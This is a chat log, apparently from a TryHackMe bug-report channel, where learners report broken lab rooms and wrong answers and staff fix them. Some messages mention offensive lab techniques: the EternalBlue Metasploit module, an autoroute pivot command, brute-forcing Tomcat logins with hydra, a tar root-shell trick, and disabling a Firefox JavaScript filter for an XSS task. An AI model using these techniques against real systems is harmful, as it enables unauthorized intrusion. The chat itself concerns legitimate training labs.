Thanks @vocal sparrow will get that updated (:

somber sierra
#

Hello can someone fix the task 20 in OWASP 10 days please, it is now a login/register rather than a comment section in the XSS stored and can't display flags

eternal summit
#

it won't have been changed

somber sierra
#

I will send screen later but the task demand to post a comment and I don't have comment section

quaint tendon
#

I dont know if someone else has this problem but there is no root flag in the Alfred room.

#

I deployed the machine two times but still no root flag in the given directory.

wispy mirage
#

Hi there πŸ™‚

#

I've run into a problem in the Burp suite room (https://tryhackme.com/room/rpburpsuite). I'm in step #2 of Task 10, and I'm looking for responses with the Set-Cookie header. I've been looking for a long time now and I can't find any. I assume that header is supposed to be included in the response to the login request to set the token, but I'm just not seeing it so I cannot continue. Am I missing something? Maybe they changed something in the OWSP Juice version that's deployed with the room machine?

somber sierra
#

of machine-ip/stored from the machine that I just lunch*

#

if someone can fix this pls 😩

#

obviously I tried to register then login but the comment section isn't there

#

IM SO DUMB

#

Sorry

#

it work perfectly

eternal summit
#

@wispy mirage You need to make sure that you are looking at responses not requests. If you see "Cookie:" then you're looking at requests.

somber sierra
#

Your site is amazing

wispy mirage
#

@eternal summit yep, I know. Still no Set-Cookie header. Ended up using a custom location for the sequencer, although the room syas to wait for 10k requests and it's been 5 minutes and it is at 7 requests 2 tokens captured :/

eternal summit
#

It's not the room, it's burp

wispy mirage
#

Wdy mean?

#

it doesn't seem like burp is being throttled as it is not consistent

#

like it will do 5 in a row then stop for a minute

#

and if I navigate to OWASP manually it also responds erratically, in fact I had to recreate the room machine because it stopped responding altogether

#

:/

#

also its weird that I'm at 26 requests with 3 errors and only 5 tokens captured

#

I think something might be broken

eternal summit
#

It's an issue with burp

#

The room works fone

wispy mirage
#

OWASP is taking a very long time to respond through firefox

eternal summit
#

The sequencer just doesn't like it and doesn't work.

wispy mirage
#

well okay so what do I do from here

eternal summit
wispy mirage
#

I'm using the stock kaly remote machine

eternal summit
#

Please?

wispy mirage
#

sure I actually also wrote my issue there

#

hey @eternal summit just to confirm, there should be a Set-Cookie header in the response of the login request right?

eternal summit
#

Nope you're looking for a socket io one usually

#

This is not a bug with the room.

wispy mirage
#

okay sorry not getting any responses there, thanks for your help though

eternal summit
#

Remember everyone is a volunteer, and it doesn't make it a bug.

wispy mirage
#

yes I know and I am very grateful for any help I might receive

#

and sorry to insist (this will be my last message about the matter) but I do think it might be a bug with the room, or at least some version compatibility issue, or the instructions are outdated or something like that, because I'm following the instructions word for word and they don't match my findings. I believe I'm looking in the right place and what should be there isn't there so I think that's a bug. I attach a couple of screenshots that should clarify this further. Thank you and good day πŸ™‚

eternal summit
#

It won't have changed

#

Other people have had it working today.

#

You see the socket.io requests? Look at those.

wispy mirage
#

huh okay I feel dumb now don't know how I missed those

#

thanks for your patience

wooden night
#

Room : The Cod Caper Problem : Machine down (restarted machine two times waited for a while to services to start still says machine down i tried to ping it doesnt work) pepehands

pine current
#

Hi!
In the room zthobscurewebvulns at the #18 after the token change the server dies immediately.

drifting lion
#

@dusky junco Hello, it seems that the answers #2 and #5 of Task3 in your Googledorking room are no longer up to date

dusky junco
#

Thanks @drifting lion I'll get this updated this afternoon

#

In the meanwhilst, here are the answers that the room expects:

#

I will get it updated shortly (:

elder rover
#

anyone familiar with /room/ccpentesting

hazy tiger
#

Just ask

elder rover
#

wrong ch sorry.

#

i was just wondering why i was getting timed out during scans

#

both gobuster and dirb

#

changed -t to 100 still..

hazy tiger
#

Most likely vpn issue

#

!vpnscript

tropic flameBOT
hazy tiger
#

If it proceeds go to tech support please

elder rover
#

Thank you

tranquil vessel
#

The Blob Blog: Completed the room this evening and checking other peoples write ups I think I may have found a bug or something just so simple everyone else over looked it. ||I managed to use tar to get a root shell instead of finding and editing the .c files||

faint ridge
#

It's a feature KEKW

verbal sedge
#

@vocal zinc feature right? kekw

vocal zinc
#

Lol what how

#

@tranquil vessel show meeeeeee

#

@vocal zinc feature right? kekw
@verbal sedge precisely kekw

#

Can you DM me

#

With how you broke my child

verbal sedge
#

need to complete the room before you fix it

faint ridge
#

THM-CVE-BL0BM3SS3DUP-2838283

tranquil vessel
#

Have dm'd

vast aurora
#

Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email

onyx wasp
#

Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email
@vast aurora there isnt a bug there

north linden
#

@onyx wasp I very very vaguely remember having this issue- the resolution was to adjust one of the firefox settings.

onyx wasp
#

okay i;ll have a look into it

north linden
#

I'll boot my VM and check the settings, see if it rings a bell.

#

@onyx wasp type about:config in the address bar, then after proceeding to preferences search bar enter browser.urlbar.filter.javascript set to False

#

Then I believe you just refresh the page and it appears.

onyx wasp
#

yeah thanks that worked

north linden
#

No problem, might be worth a note being added to the question to make users aware of firefox's xss protection/js filter

bold ermine
hazy tiger
#

Check your VPN

#

!vpnscript

tropic flameBOT
hazy tiger
#

@bold ermine

vocal zinc
#

Reset the box and do the same thing @river swallow

#

You probably crashed it or something from trying too much

river swallow
#

Reset the box and do the same thing @river swallow
@vocal zinc okay. I'll try doing this. Thanks.

bold ermine
#

i am using VPN lol

faint ridge
#

That's not what they said, they said run the script @bold ermine it diagnoses issues

river swallow
#

Reset the box and do the same thing @river swallow
@vocal zinc IT WORKED! Maybe I really crashed it somehow. Damn. xD

vocal zinc
#

πŸ₯³

maiden bane
#

Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email
@vast aurora There's a spacing

maiden bane
#

@onyx wasp type about:config in the address bar, then after proceeding to preferences search bar enter browser.urlbar.filter.javascript set to False
@north linden did this but still having the same issue as daemon. any other workaround?

faint ridge
#

That's the fix. It worked for Daemon

maiden bane
#

That's the fix. It worked for Daemon
@faint ridge was hoping it works for me though

faint ridge
#

You restarted Firefox?

maiden bane
#

I even refresh and restart firefox

#

yes i did

faint ridge
#

Move it to #room-help explain your issue. This isn't a bug with the room

maiden bane
#

lemme try restart the vm. if it persist, i'll moved it there. thanks!

twin bay
#

Room: rptmux

Since answers are case insensitive, the incorrect version is considered correct (Top is g, not G)

hazy tiger
#

That’s answer tolerance nothing can be done about that

twin bay
#

No option for the room creator to force case sensitivity in answers?

hazy tiger
#

Nope

twin bay
#

Aaah - Oof.

fickle prism
#

Hi Everyone, in the Authenticate room on Task 4 #1, the base64 encoded example provided in the explanation is actually the answer to the question. The "identity" number is set to 2 in the example, but the encoded bit to access user2:guest2 is actually the admin string. Hope that's clear enough πŸ™‚

vast aurora
#

Hello- currently in OWASP top 10, task 22. Not a bug just a grammar typo: " ...having to do the leg-work of write all lines of code. not sure if THM wants to be made aware of it, but there it is.

dusky junco
#

I'll fix that! Thanks @vast aurora That's my task for that day as well πŸ˜…

sonic rover
#

I could be wrong, but in Blaster room with a normal nmap scan (-sC -sV), I'm seeing a lot more ports open than the answer says

eternal summit
#

Known issue, windows machines are inconsistent with numbers of open ports

#

Does the hint just give you the answer?

sonic rover
#

Theres no hint for it

eternal summit
#

RIP ok. It's just windows being windows really

sonic rover
#

No worries, There were only a handful of answers after counting the *s

sonic rover
#

Blaster again, I'm afraid. As per the instructions, I've RDP'd into the machine, and am looking for Task3 #1 'Look around the machine and see if you can find the CVE which was researched on this server'. I'm 100% sure I'm looking in the right place, but there is no previous activity in that location

hazy tiger
#

Yes that is a bug

sonic rover
#

Rightio

hazy tiger
#

No internet history

sonic rover
#

I was careful to do no spoilers!

hazy tiger
sonic rover
#

Merci πŸ™‚

desert solar
#

Hello, I'd like to report a wrong answer on a question for the room "Google dorking". On task 3 question 2: "Does "tryhackme.com" pass the β€œKeywords Usage Test?” (Yea / Nay)"

The answer that is accepted is "Nay" but the actual correct answer is "Yea" (as proved on this image)

If I can provide any other information, let me know.

dusky junco
#

Hi, thanks for reporting @desert solar - I'll get that updated

faint quail
#

Hi! I'd like to report a problem in the room 'Learn Linux': i'm using the password 'shiba1' but it doesn't work, It returns 'permission denied'.

eternal summit
#

Chances are you're trying to access the wrong VM

#

Nothing has changed with Learn Linux

faint quail
#

Thanks

icy elbow
#

Not sure if this has been reported yet, but the Password for the admin panel on the room Brute IT isn't the password that the answer takes. (at least it's not the one that I got from hydra that works)

eternal summit
#

Thanks, the testers are discussing this atm

icy elbow
#

Roger

eternal summit
#

That's reported just above your message πŸ™‚

drowsy jolt
#

πŸ˜„ oh :D:D:D

#

deleted it than

eternal summit
#

Muir's fixing it ATM

#

Should be fixed now, thanks to the two of you for reporting this

drowsy jolt
#

is the rsa key broken too ?

eternal summit
#

Not sure, will check in. What seems to be broken about it?

drowsy jolt
#

i cracked it with john but i cant login

#

load pubkey "id": invalid format

eternal summit
#

Cool thanks

#

Oh that's not actually an error

#

it will say that even when the key is valid, dw

drowsy jolt
#

ok so i did something wrong

eternal summit
#

Most likely πŸ™‚

drowsy jolt
#

aa ok

#

works than

#

i fat fingered the password πŸ˜„

scenic leaf
#

guys dont know if this is a glitch or what but on the metasploit room, on making cisco proud, the first question i gave this answer |||run autoroute -n 172.18.1.0 24 255.255.255.0 || and it returned correct. Now I am checking the video and the answer is ||run autoroute -s 172.18.1.0 -n 255.255.255.0 || is this a bug or either answers work ?

eternal summit
#

That's answer tolerance

#

You're close enough to the "correct" answer that THM just gives you it

scenic leaf
#

meh

twin tapir
#

you say meh until you get a really hard and long answer and are struggling for one hour because there’s no answer tolerance

obsidian flame
#

+1

pine trail
#

Having an issue with "Authenticate" room - Task 2 Dictionary Attack. When I connect to the port on the first step there is an SSL error "SSL_ERROR_RX_RECORD_TOO_LONG". I'm not going through burp/zap proxy... just trying to connect to the site as stated in the instructions.

eternal summit
pine trail
#

thanks

wheat fractal
#

Hi, metasploit room is stuck launching at 47% for more than 15 mins is that normal?

#

same for Vulnversity but at 5%

eternal summit
#

@wheat fractal That is a progress indicator, not a VM loading bar

#

It indicates how much of the room you've completed.

wheat fractal
#

ohh thanks then my issue is connecting is weird because I'm connected with openvpn

#

but cant ping nor nmap them

eternal summit
#

Not all machines respond to pings, please use the appropriate help chats for help

rustic stump
#

Refrain from posting a question across multiple chats for starters πŸ™‚ Also Screenshots are better than a photo of your screen

pale lotus
#

K sry

#

I am new to this

sterile sand
#

Anyone facing issues with Internal room?

#

After I enter the login credentials in CMS, server not found error occuring

proper jasper
#

not sure if this is a bug, ive asked around and it seems it shoudl work... but 'thompson' i cant brute force the creds. even the correct creds do not work in the brute force, and then, after a brute force the creds stop working for a time too. im guessing it maybe has brute force detection or something but yeahhh. If i am wrong please someone explain as its been stressing me out all morning thinking im incompetent. note - the creds work prior to a BF, but not during or after... ive booted the box 3/4 times and tried different ways but not once has the BF worked. i am brute forcing with the MSF module tomcat_mgr_login, hydra witha tomcat default wordlist, and with a custom script that i wrote, and another script from github. I tried with the custom scripts just the correct username and pass, and it worked, but with lots of other creds it fails.

proper yew
#

@sterile sand I'm the creator. A bit more information on your issue would be helpful.

sterile sand
#

After I found the credentials in WPscan, and return back to the login page, once I entered the credentials the URL is getting changed to something thmhost and display server is down

proper yew
#

Doesn't seem like a room issue.

#

Did you follow the instructions about modifying your /etc/hosts file?

sterile sand
#

Oops I forgot about it

#

Will rectify it

#

Thanks

exotic cobalt
#

the images in the room are no longer loading and the pages take too much time to load How can I solve this?

eternal summit
#

Your ISP is most likely blocking imgur. Change your DNS or try a VPN. @exotic cobalt

exotic cobalt
#

But I use your VPN service. Should I try another VPN region?

obsidian kiln
#

But I use your VPN service. Should I try another VPN region?
@exotic cobalt The THM VPN is a remote access VPN -- not an anonymising VPN

vast aurora
#

room 412 introductory networking- pcap file for wireshark does not contain any information

west flax
#

anyone else has a lot of fails running the exploit/windows/smb/ms17_010_eternalblue on /room/blue ?

eternal summit
#

Can you show options and post a screenshot please?

west flax
#

Sure will do.
Currently restarting the Target Machine and will try again (as mentioned in the description)

eternal summit
#

That LHOST is incorrect, it needs to be your VPN IP, your tun0 IP. In future, can I get you to ask in #room-help first please?

west flax
#

Allright thx. Sure. It was just that yesteraday I hadn't configured LHOST and it worked (sometimes)

#

Also it mentioned that it might fail in the task description πŸ™‚

#

Thx 4 your help, will try the LHOST thingy

eternal summit
#

It will fail every time if your settings are incorrect

west flax
#

That makes sense, but for some reason It worked yesterday. Probably LHOST was set sometime somewhere somehow. Maybe a save or so...

#

I read about saving some options variables in the metasploit room witch I did a few days ago.

wheat echo
#

In the room Corp Admin password is expired and asked to be changed when connecting through rdp, which is really really anoying to try to copy letter by letter the original password to change

twin tapir
#

from my understanding it’s intended

wheat echo
#

Oh ... okay.

#

@twin tapir can I ask if we should change the password or there is something else to do ?

twin tapir
#

Have you looked at writeups?

wheat echo
#

Yes I did

#

one did an "exploit" not "authorized" the other does not specify anything regarding this issue.

twin tapir
#

You can probably just change the password πŸ€·β€β™‚οΈ

wheat echo
#

I tried a few times without success. (without copy paste into RDP with an AZERTY keyboard is not easy to copy a 20long random char password ! )
I gave up since you said it was intended πŸ™‚
I'm going to try again I guess

wheat echo
#

I can confirm you have indeed to change the password manually. I did at least 30 attempt to do this... really unconveniant and there is nothing to learn with this...

#

especially with capital I which could easily mistaken with minus l

lethal dagger
#

Room MAL: REMnux - The Redux task 6 run volatility -f Win7-Jigsaw.raw imageinfo getting error. other commands are fine

dusky junco
#

Hi, can you share the error message please?

dusky junco
#

Oofta I think I've identified it

glad badger
#

Now thinks the MN in CMN stands for Minnesota. πŸ˜‰

#

Oofta!

bronze stirrup
#

Hey guys I am facing some issues on uploading rooms

#

Whenever I try to upload it says connection intrupted. But I had a good internet connection. Can I able to send download link insted of upload room

twin tapir
#

If you’re continuously having issues you could put it in google drive and ask one of the admins nicely if they can upload it for you

#

might be something bee can do as well but don’t know if they have those perms yet

obsidian kiln
#

Given Bee's in support, I doubt they'll be given AWS creds kekw

twin tapir
#

Can you move a material from one to another?

bronze stirrup
#

Facing almost 7+ hours

twin tapir
#

If you’re continuously having issues you could put it in google drive and ask one of the admins nicely if they can upload it for you

proven creek
#

In the Madness room I couldn't get the shell exploit for the suid binary to get root to work for some reason and couldn't find another way to get access to that flag 😦
Really enjoyed that room otherwise though πŸ™‚

fleet cliff
#

box : rpnessus task-4 (scanning !) : The answer for the apache version does not match with the VM.

obsidian flame
#

I am aware of an issue with NIS Linux Part One that is going to be fixed soon. Apologies for that!

dusky junco
#

Room MAL: REMnux - The Redux task 6 run volatility -f Win7-Jigsaw.raw imageinfo getting error. other commands are fine
@lethal dagger I've just written a workaround for this in the tasks (essentially skip this part, the answer is now provided). Volatility is really struggling to perform that step on the limited resources available on such a large memory dump. Thanks for letting us know

lethal dagger
#

no probs, cheers bro!

#

Room NIS - Linux Part I the answers need to be case senstive.

#

How do you show information that comes from a symlink using ls? ls -l passed it

obsidian flame
#

erm, not sure what you mean @lethal dagger which question is that referring to?

#

I am aware of an issue with NIS Linux Part One related to binwalk that is going to be fixed soon. Apologies for that!
Issue has been fixed

lethal dagger
#

Hi @obsidian flame , Task 2 ls How do you show information that comes from a symlink using ls? it accepts the ls -l

#

I've cleaned the cache and re-login again. it still showing ls -l

obsidian flame
#

hmm, let me double check that right now

#

i mean -L just shows you the file being referenced by the symlink

#

you are right, i might change the wording to the question

#

done, refresh @lethal dagger

#

not a lot of people look specifically at the symlink so i don't think it's worth mentioning

#

But, if i see more challenges that address symlinks i might as well get a Linux Part II

lethal dagger
#

checked βœ…

obsidian flame
#

thanks for letting me know about it, any feedback is also welcomed ^^

lethal dagger
#

cooli, Linux Part II sounds great

dusky junco
#

"Intro to x8664" has had a url 404'ing for at least of couple of months (reported on the forums)

I've replaced it with an archived copy from the way back machine:

vocal zinc
#

@dusky junco pro haxx0r using wayback machine for something practical

#

πŸ‘€

undone drift
#

Room: OWASP Top 10
Task 20, second question.

Hello. I don't know if this intended or not either but the link: _http://MACHINE-IP/reflected_ is not working. It is not hard to find the reflected page but using the one mentioned in the question is a little deceiving. In order to work it should be at least _http://MACHINE-IP/reflected?keyword_. I hope I'm not wrong πŸ˜„

obsidian kiln
#

Right. I have had enough of that question. I'm having a shave, then it's getting fixed πŸ˜†

#

Actually. Better idea. @dusky junco go fix 😁

dusky junco
#

Various things with that room are being fixed - it's on my todo today. Just carrying on a little bit from yesterday

obsidian kiln
#

There we go πŸ˜„

dusky junco
#

However I shall do! The user's gotta use the "reflected" button on the home page, right?

obsidian kiln
#

Yep, exactly. Remove the page from the link, and add an instruction about using the button

dusky junco
#

Perfecto, just as thought

undone drift
#

πŸ₯°

dusky junco
#

Fixed, a refresh will do update the task (also made the URL's open in a new tab) @undone drift @obsidian kiln

obsidian kiln
#

Awesome. Ta CMN

eternal summit
#

@obsidian flame Task 2 last question is incorrect, unless you specify non-hidden and non-recursive.

#

(Nis Linux)

obsidian flame
#

ok, thanks for that, you are right

#

refresh @eternal summit

#

better now?

eternal summit
#

Yep, thanks

obsidian flame
#

No worries, thank you for letting me know

eternal summit
#

@obsidian flame The curl question, there's no indication that it wants you to use silent mode. It works just fine without silent mode, other than you see the progress

obsidian flame
#

thanks for spotting that out

#

fixed @eternal summit

eternal summit
#

Mask definitely doesn't line up with the correct answer

#

yeah expected answer ignores the fact you're asked to get the flag.txt

obsidian flame
#

yikes how did i miss that one

#

lol

#

solved now

#

anything else while we are at this chapter

eternal summit
#

On the room? You name the achieve extension and 7z should be the tool for you. should read archive probably? in the zip section

obsidian flame
#

grammarly done its job properly

#

done

#

if you want to do the tasks use this ip 10.10.98.255

#

it 's up for another 27 mins

torpid glade
obsidian flame
#

fixed @torpid glade please refresh

torpid glade
#

Wow quick response thank you for fixing it :)

obsidian flame
#

(if you try to say about 7z being borked i am aware of that)

#

no worries ^^

torpid glade
#

Thank you for the heads up, I will leave that one for later if I can't get past it.

#

Great room by the way

obsidian flame
#

thank you for your feedback and sorry for the issues caused

torpid glade
#

No worries. πŸ™‚

burnt loom
#

forbusinessreasons seems docker container doesn't start. ports stay closed

shrewd kelp
#

The backend of "ConvertMyVideo" is not working 😦

vocal zinc
#

Huh?

lusty obsidian
sonic rover
#

@burnt prairie Sorry to tag, but I think something might be awry in Startup - But wanted to run it past your first to see if it's me being silly first

burnt prairie
#

ofc whats up

#

@sonic rover

sonic rover
#

Ok, Just so you know - It was fine the other day and I got a shell.

#

I logged off, then logged on again and my exploit didnt work again and it drove me mad

#

I checked the writeups and the one glaring difference is that the jpg file from the folder is missing

#

And my exploit didnt work, obvs

burnt prairie
#

alright can you dm me the details uncle, ill help you out

sonic rover
#

Sure

shrewd kelp
#

Huh?
@vocal zinc
The "Converter" doesn't awnser or process any requests

#

The backend//api

vocal zinc
#

Can you show what you’re expecting to happen when you do something vs what actually does?

shrewd kelp
#

S*** πŸ˜… maybe tomorrow

#

I already turned off the computer and just saw your answer now

#

Im sorry

vocal zinc
#

Nothing to be sorry about

barren lynx
#

Room: Buffer Overflows.
The answer should be "rip" not "rax"

http://phrack.org/issues/49/14.html#article
From: "Smashing The Stack For Fun And Profit"

"This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack.** We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:"**

While rax stores the return value of the called function.

cobalt otter
obsidian flame
#

@cobalt otter it's answer tolerance

cobalt otter
#

oh, didn't seem to take --recursive for me, perhaps I made a typo though, cool

obsidian flame
#

refresh your screen

cobalt otter
#

yeah, it's updated, nice!

obsidian flame
#

(i haven't changed anything)

#

it's just the answer tolerance picking up your answer as correct

cobalt otter
#

cheers

obsidian flame
#

no problemo

wheat fractal
#

@obsidian flame Hi Chevalier has the bug with ||grep|| been fixed on your "NIS - Linux part I" ?

obsidian flame
#

yes

#

i pinged you in room hints yesterday @wheat fractal

wheat fractal
#

I haven't received the ping I don't know why, also I don't see the message now. Anyway thanks for the fix πŸ™‚ @obsidian flame

rugged marlin
timber bone
#

i just tagged you on room help

wheat fractal
#

Hi πŸ™‚ I come here because, I have problems on For Business Reasons room. When I ran nmap, all ports are closed ( port 80 included). I can't access to the web page at all ... @cobalt otter As the same problem on my room ip : 10.10.37.158.

cobalt otter
#

I get the same issue on "For Business Reasons", launched the room, tried nmap after 5, 10 & 15 mins, port 80 closed in all cases

wheat echo
#

Hi there, it seems that room https://tryhackme.com/room/heartbleed can't load the VM

timber bone
#

have you tried terminating and redeploying?

wheat echo
#

yes

#

tried 2 times.

dusky junco
#

Do you have any errors in your web browser console? I've just deployed one fine Perhaps try a different browser

wheat echo
#

@dusky junco it does work back. thanks.

dusky junco
#

Wicked πŸ‘

amber onyx
#

It possible I found a bug in the room Blaster when I do an nmap scan I get 3 open ports as a result and when I answer the question as to how many open ports there are it seems to be incorrect

#

I looked it up and other people get 2 ports which is the answer

#

I already tried to restart the machine and I get the same open ports

eternal summit
#

It's a Windows thing

amber onyx
#

Also I get no version output for the ports

#

So you mean that it's because my VM is running on windows?

#

I also got different ports from the example I was looking at

eternal summit
#

The target VM is windows

#

Windows is inconsistent with open ports

amber onyx
#

ok thank you

eternal summit
#

I'd also ask in #room-help because you should at least get 2 of the same ports

lofty pilot
#

Hi πŸ™‚ I come here because, I have problems on For Business Reasons room. When I ran nmap, all ports are closed ( port 80 included). I can't access to the web page at all ... @cobalt otter As the same problem on my room ip : 10.10.37.158.
@wheat fractal Same issue all ports are closed

wheat fractal
next bluff
#

yes

#

because you are supposed to exploit an HTTPS

obsidian flame
#

i think he tries to say that it has a public ip

timber tendon
#

I'm having issues with the eternalblue POST meterpreter upgrade module - has anyone completed this recently or can confirm the issue I'm seeing is maybe localized to my environment

eternal summit
#

The default payload is now a meterpreter so you no longer need to use that module.

#

In future, questions like that would be best suited to #room-help, directly showing us what the issue is rather than asking if anyone has completed it recently.

timber tendon
#

understood thank you for the response

brisk fox
#

Hi, When I use enum4linux(Tried enum4linux-ng) on the 2 different rooms

#

Dest. IP address is down. Tried terminate and redeploy but after enum4linux I'm getting same issue πŸ˜„

#

Example rooms: relevant, nerdherd

#

Is it this normal?

placid abyss
#

Room - Learn Linux

Not sure if this was supposed to be the right anwser, but I would have though it would be "-n" and not just "-"?

eternal summit
#

If you refresh, does it change?

#

If so, that's either answer tolerance or you removed the n between submission and acceptance

placid abyss
#

Yeah that worked sorry

lone dust
#

hi i am having trouble with cc:steganography task 4 exiftool.

daring merlin
#

@lone dust just do
sudo apt-get install exiftool

eternal summit
#

It suggests an apt update so that's the best idea. This isn't really a bug with the room, it's an issue with your system.

wheat fractal
twin tapir
#

Answer tolerance

#

it’s intended

wheat fractal
#

ahh okay lol

teal barn
obsidian kiln
#

@dusky junco that one's yours

dusky junco
#

Ah yeah, it appears it isn't

teal barn
dusky junco
#

That's no good

#

Bare with πŸ‘

#

That tool has changed since, just updating the questions

#

Okay, please refresh @teal barn thanks for reporting. That room should be future proof now πŸ˜…

teal barn
#

haha yes

brisk fox
#

Hi, When I use enum4linux(Tried enum4linux-ng) on the 2 different rooms
@brisk fox again down :/

vocal zinc
#

That’s not enum4linux...?

brisk fox
#

Regardless of the tool I use, all kinds of VM crashes. I don't understand 😦

vocal zinc
#

I mean. Rpcclient isn’t going to work unless rpc is open

#

I have no clue which room you’re doing or if rpc is open and seeing that you said β€œenum4linux” and then showed using rpcclient I’m leaning towards this being user error

brisk fox
#

I was used 2 different rooms(Relevant and NerdHerd). When I use rpcclient or enum4linux(Some enum4linux functions are uses rpcclient on background) I hadn't reaching remote server. Maybe I have bad luck I don't know. Sorry I'm late. My english not very well. I was use google translate for tell you of the in my mind.

vocal zinc
#

You need to give more information. Like screenshots preferably

brisk fox
#

Okey I will send. Ty.

brave sorrel
#

Hi i found in the 25daysofchristmas room, is it worth mentioning it?

teal barn
#

https://tryhackme.com/room/dailybugle
typo error in description ("practice")

-Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
+Compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.
faint ridge
#

Practise is the British way to spell it.

#

@teal barn

#

Practice is the American

#

Why they have both in there idk

eternal summit
#

In Australian and British English, 'practise' is the verb and 'practice' is the noun.

tall lark
#

hello, im on room of LLE and found that on task #1 , instead of saying MACHINE_IP it says MACHINE_UP. @next bluff

next bluff
#

Fixed, thank you for reporting

high palm
#

unable to ssh in psycho_break machine anyone can look into issue?

#

@tacit shadow Kindly see

obsidian kiln
#

Good chance that SSH isn't open on port 22 then.πŸ™‚

high palm
#

let me show you

#

@obsidian kiln nmap -sV 10.10.196.96
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-15 21:50 IST
Nmap scan report for 10.10.196.96
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

#

ok it worked idk how

twin tapir
#

Those are two different ips

high palm
#

i powered up machine once again

#

so obvious ip will change

tacit shadow
#

Hey @high palm whats up. The ssh is supposed to be opened and it's working fine.

#

Maybe rebooting the box might help skidy .

high palm
#

i did same

#

but this box really gave me trouble

#

in technical kar

#

term

#

btw @tacit shadow how much time it will till i get root console its been 15 min already

tacit shadow
#

Sorry @high palm I couldn't get u. Do you mean the time it takes to get root shell ?

high palm
#

yea

tacit shadow
#

usually like 2-3 mins

high palm
#

i saw cron job pasted script

#

been 20 min

#

can i dm you for if any issue in script

tacit shadow
#

yeah sure

vocal zinc
#

been 20 min
@high palm run whatever you have in the script locally to see if it works as you’re expecting

high palm
#

i did found the issue

vocal zinc
#

I figured you had. That was just a general tip

high palm
#

i didnt add subprocess library 0day

#

not sure whether im ready for 0X13 pepehands

vocal zinc
#

Everyone makes mistakes

#

except me

obsidian kiln
#

Yeah

#

You just are a mistake

high palm
topaz thorn
#

That’s not the correct answer

#

You’re missing one number

faint ridge
#

Yes

radiant basin
compact meadow
#

@dusky junco

vocal zinc
#

I don’t see the bug πŸ‘€

#

What am I missing 😱

compact meadow
#

How would you set SMBPass to "username"

hazy tiger
#

?

#

How would you set the SMBUser to "password"

#

Smh meowware

vocal zinc
#

I thought it was intentional

hazy tiger
#

You never know maybe they want the user to be password

dusky junco
#

Yeah I thought it's intentional too

#

@wheat fractal shed some light pls

eternal summit
#

It is intentional

#

To make sure you read the question

radiant basin
#

πŸ€”

#

That's intentional?

#

Comes across as poor spell checking

obsidian kiln
#

I mean, that's 100% stereotypical Para

#

Turning things upside down to throw people off balance

radiant basin
#

Each to their own

subtle harbor
#

For Crack the hash, Task 2 Question #3, it provides a sha512crypt hash with salt "aReallyHardSalt" and rounds: 5. but the indented solution uses default rounds instead of rounds: 5 ?

wheat fractal
#

i have a bug in jack. but talking about it will give something away. where can i discuss this safely ?

wheat fractal
#

I need some assistance. I'm having trouble accessing the web server url in the LFI room for the Web Fundamentals path.
@kind knot wrong channel room help is 5 stories up

kind knot
#

ah my bad

#

ty

wheat fractal
obsidian kiln
#

Ahahaha. Zay....

wheat fractal
#

Ahahaha. Zay....
@obsidian kiln ?

obsidian kiln
#

The creator (Zayotic) made a bit of a mistake in that one apparently

#

He's away just now, so it probably won't get fixed. Bit of a shame though

#

Unless...

wheat fractal
#

ah ok. i can delete the post if it helps. but yeah if the bug stays. solved it the intended ways after that. would be great if it gets fixed. is def a shortcut this way.

obsidian kiln
#

If I get a chance I'll go in as non-destructively as possible and fix it

#

Actually, sod it, I'll do it now

placid abyss